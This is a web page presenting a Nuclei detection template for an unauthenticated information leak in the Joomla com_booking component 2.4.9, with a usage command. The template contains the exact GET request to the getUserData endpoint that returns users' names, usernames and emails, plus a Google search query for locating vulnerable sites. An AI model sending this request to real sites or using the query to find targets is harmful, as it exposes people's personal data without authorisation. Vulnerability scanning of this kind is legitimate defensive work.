Skip to content

Joomla! com_booking component 2.4.9 - Information Leak

ID: joomla-com-booking-component

Severity: high

Author: r3Y3r53

Tags: joomla,info-leak,unauth

Joomla! com_booking component suffers from Information leak vulnerability in which sensitive or confidential data is unintentionally exposed or made accessible to unauthorized individuals or systems.

id: joomla-com-booking-component
info:
name: Joomla! com_booking component 2.4.9 - Information Leak
author: r3Y3r53
severity: high
description: |
Joomla! com_booking component suffers from Information leak vulnerability in which sensitive or confidential data is unintentionally exposed or made accessible to unauthorized individuals or systems.
reference:
- https://www.exploit-db.com/exploits/51595
- http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download
metadata:
verified: true
max-request: 1
google-query: inurl:"index.php?option=com_booking"
tags: joomla,info-leak,unauth
http:
- raw:
- |
GET /index.php?option=com_booking&controller=customer&task=getUserData&id=123 HTTP/1.1
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"name":'
- '"username":'
- '"email":'
condition: and
- type: regex
part: body
regex:
- '^{.*}$'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: json
name: keys
part: body
json:
- 'keys'
# digest: 490a004630440220461e62d8b0b1a35edb99c47d36ea196289e8641d29a3dcd324dfadf9038728d2022005cf090713ca071291075b71ffcbe1bf95f195e5235dd280b0dd84a0cc97c615:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/joomla/joomla-com-booking-component.yaml"

View on Github